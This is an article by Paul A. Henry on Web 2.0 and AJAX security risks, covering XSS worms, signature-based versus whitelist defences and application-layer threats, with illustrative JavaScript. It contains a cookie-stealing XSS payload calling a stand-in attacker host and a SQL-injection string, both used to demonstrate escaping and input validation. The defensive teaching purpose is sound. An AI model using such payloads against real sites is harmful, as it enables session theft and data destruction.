
Did You Get the Web 2.0 Memo?

No, you did not miss the memo or a software upgrade notice, yet you've already arrived at Web 2.0

What’s Secure?
When discussing Web 2.0 security, keep this dynamic in mind: AJAX is not inherently insecure, but many of today's insecure Websites are built with AJAX.

Over time, we have vetted the majority of security issues with the underlying protocols of Web 1.0. Today, however, the layering of new, next-generation programming techniques on top of these protocols in Web 2.0 has given the Internet's bad guys a whole new set of opportunities to exploit. A great example is, of course, AJAX, the popular Web 2.0 programming technique. The asynchronous nature of AJAX clearly improves the user's experience on a Website by taking interactivity to an entirely new level. However, it also dramatically increases the chances that things can go terribly wrong from a security perspective.

Here's why: older synchronous programming models restricted interaction to a defined and orderly format – safeguarding us all from security chaos. In stark contrast, AJAX operates asynchronously, so actions do not necessarily follow a defined, orderly sequence. The result: it's nearly impossible to fully vet every potential bug that could result in a security issue. All of the risks associated with any programming language (such as race conditions, code correctness, object violations, and incorrect error handling) are amplified significantly in an asynchronous environment such as the one AJAX provides.
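To make the race-condition risk concrete, here is a hypothetical sketch. The request/response objects are simulated (no real XHR), so the reordering is deterministic; it shows how out-of-order asynchronous responses can leave stale data on screen unless the handler guards against superseded requests:

```javascript
// Sketch: two "AJAX" requests whose responses arrive out of order.
// All names here are hypothetical; responses are simulated so the
// race is deterministic and reproducible.

function makeSearchBox() {
  let latestRequestId = 0;
  let displayed = null;

  return {
    // Naive handler: whichever response lands last wins,
    // even if it belongs to an older, superseded request.
    naiveUpdate(response) {
      displayed = response.text;
    },
    // Issue a new request; returns its sequence number.
    send() {
      return ++latestRequestId;
    },
    // Guarded handler: ignore responses from superseded requests.
    guardedUpdate(requestId, response) {
      if (requestId === latestRequestId) displayed = response.text;
    },
    shown() { return displayed; }
  };
}

const box = makeSearchBox();
const req1 = box.send();           // user types "ca"
const req2 = box.send();           // user types "cat"

// The network reorders delivery: the newer response arrives first.
box.guardedUpdate(req2, { text: 'results for "cat"' });
box.guardedUpdate(req1, { text: 'results for "ca"' });  // stale, dropped
console.log(box.shown());          // results for "cat"
```

With `naiveUpdate` instead of `guardedUpdate`, the stale "ca" results would silently overwrite the correct ones – exactly the class of ordering bug that synchronous request/response flows never exposed.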

The mere use of AJAX in Web 2.0 applications can increase the possible threat envelope due to the increased interactivity with the user’s browser. Further, if the Website-based AJAX program also needs to interact with the JavaScript that runs on the user’s browser, an additional security risk is now added to the risk equation.

Some pundits argue that AJAX in and of itself is not at fault and does not increase the threat envelope. Instead, they would argue, the real issue is AJAX programmers. By using AJAX to increase application functionality, the programmer theoretically increases the possible number of server-side vulnerabilities. This argument actually supports my original position: I never said bugs within AJAX were causing the threat-envelope problem. I clearly said it is the "use" of AJAX that increases the possible threat envelope.

One final point on AJAX: it is relatively new, and secure programming standards have not yet been fully vetted. As a result, traditional Website vulnerabilities to attacks like XSS (Cross Site Scripting) could start re-appearing in Web 2.0 Websites.

Consider this: the worm used to attack MySpace and the worm used to attack Yahoo! – both enabled by AJAX – took advantage of a component of AJAX called XHR (XMLHttpRequest) to propagate.
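Worms of this kind typically inject script through user-supplied fields (a profile page, a message body) that the site echoes back without encoding. A minimal sketch of the output-encoding step whose absence enables such stored XSS – this is a hypothetical helper for illustration, not a complete sanitizer; real applications should rely on a vetted, context-aware encoding library:

```javascript
// Sketch: escape untrusted input before inserting it into HTML.
// The ampersand must be replaced first, or already-escaped entities
// would be double-encoded.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A profile "about me" field carrying a cookie-stealing payload
// (the URL is a made-up example):
const payload =
  '<script>new Image().src="//evil.example/?c="+document.cookie</script>';

// Escaped, the payload renders as inert text in the victim's browser
// instead of executing.
console.log(escapeHtml(payload));
```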

Déjà vu – Are We Building Yet Another Bubble?
Web 2.0 certainly allows us all to innovate on the Internet. Unfortunately, much as in the Internet boom of the late 1990s, businesses and individuals are rushing the deployment of these new Web capabilities and features with little, if any, regard for security.

Hence, due in large part to rushed Web 2.0 implementations, we now find the Internet a more dangerous place than it has ever been. Web-based e-mail providers, photo-sharing Websites, blogs, Wikis, and social networking sites have all fallen victim to malicious hackers because security was an afterthought in the "new" Web 2.0 world.

Internet Threat Vectors
In their quest to harness the power of the Internet, enterprises began increasing the connectivity of their internal applications to the Web. The threat vector originally involved layer 4 (the transport layer) of the OSI model, where inspection is primarily limited to IP addresses and port numbers in stateful packet filters. But the threat vector soon shifted to layer 7 (the application layer), where attackers could exploit the vulnerabilities of Internet-connected applications.

Now, for the problem: as the threat vector shifted from layer 4 to layer 7, our defenses simply did not keep pace.

With the change in the threat vector, signatures for known attacks began to find their way into firewall security products. Some stateful packet filter vendors attempted to offer at least some level of application-layer attack protection. This protection methodology is often called a Negative Security Model: all traffic is allowed to flow freely, and the protective mechanism layers signatures of known attacks on top of the stateful packet filter. This approach attempts to enumerate potentially malicious traffic and to block it only once (and if) it has in fact been identified.

Unfortunately, the Negative Security Model is reactive by nature. Admittedly, these products are marketed as proactive because they can automatically block an attack on the user's behalf. However, a signature for a given attack must first be created before any defense against that particular attack can be afforded. In reality, this methodology is not proactive at all; it is at best reactive. In today's environment, where over 6,000 application vulnerabilities are reported annually, vendors are having a difficult time maintaining defensive signatures for these known attacks.
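The gap between the two models can be sketched on a single request parameter. The signatures and the whitelist rule below are hypothetical examples, chosen only to show why enumerating badness fails against a novel attack while enumerating goodness does not:

```javascript
// Negative Security Model: allow everything except known-bad signatures.
const attackSignatures = [/<script/i, /union\s+select/i];

function negativeModelAllows(input) {
  return !attackSignatures.some(sig => sig.test(input));
}

// Positive Security Model: deny everything except explicitly valid
// input (here, a hypothetical order ID must be 1-10 digits).
function positiveModelAllows(input) {
  return /^[0-9]{1,10}$/.test(input);
}

// A novel SQL-injection payload for which no signature exists yet:
const novelAttack = "'; DROP TABLE orders;--";

console.log(negativeModelAllows(novelAttack));  // true  (slips through)
console.log(positiveModelAllows(novelAttack));  // false (rejected)
```

The negative model stays blind until a vendor ships a matching signature; the positive model rejects the payload on day zero because it was never on the list of permitted input.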

What about all the unknown threats circulating across the Web? A recent study found that the typical vulnerability exists for up to 348 days before public disclosure. Hence the malicious hacker who found the vulnerability could potentially have free rein for nearly a year to exploit a vulnerability before a defensive signature can be created.

The problems don't end there. In a recent article, IBM warned that there is a colossal difference between the number of vulnerabilities disclosed publicly and the number that are discovered but never publicly reported. IBM has estimated that up to 139,362 vulnerabilities are discovered annually – but not reported publicly.

Remaining Application-Layer Risks with Web 2.0
Clearly, the increased functionality of Web 2.0 Websites, along with the relatively new underlying programming techniques, is creating new threat vectors and revitalizing traditional ones. The most common and "most concerning" threat vectors for Web 2.0 include:

  • Web-borne malware
  • Real-time RSS/Atom Feeds with JavaScript Malware inside
  • XSS (Cross Site Scripting) – e.g., the MySpace worm
  • CSRF (Cross Site Request Forgeries) – stealing data in JavaScript space, e.g., Gmail
  • XSS filter bypassing – encoding tricks
  • Exponential XSS Attacks – No need to limit to one Website
  • Forging “request headers” using Flash
  • Backdooring Media Files – JavaScript in everything

More Stories By Paul A. Henry

Paul Henry is a global information security expert with more than 20 years' experience managing security initiatives for Global 2000 enterprises and government organizations worldwide. At Secure Computing, he plays a key strategic role in new product development and directions. In his role as vice president of technology evangelism, he also advises and consults on some of the world's most challenging and high-risk information security projects, including the National Banking System in Saudi Arabia, the U.S. Department of Defense's Satellite Data Project, and both government and telecommunications projects throughout Japan.

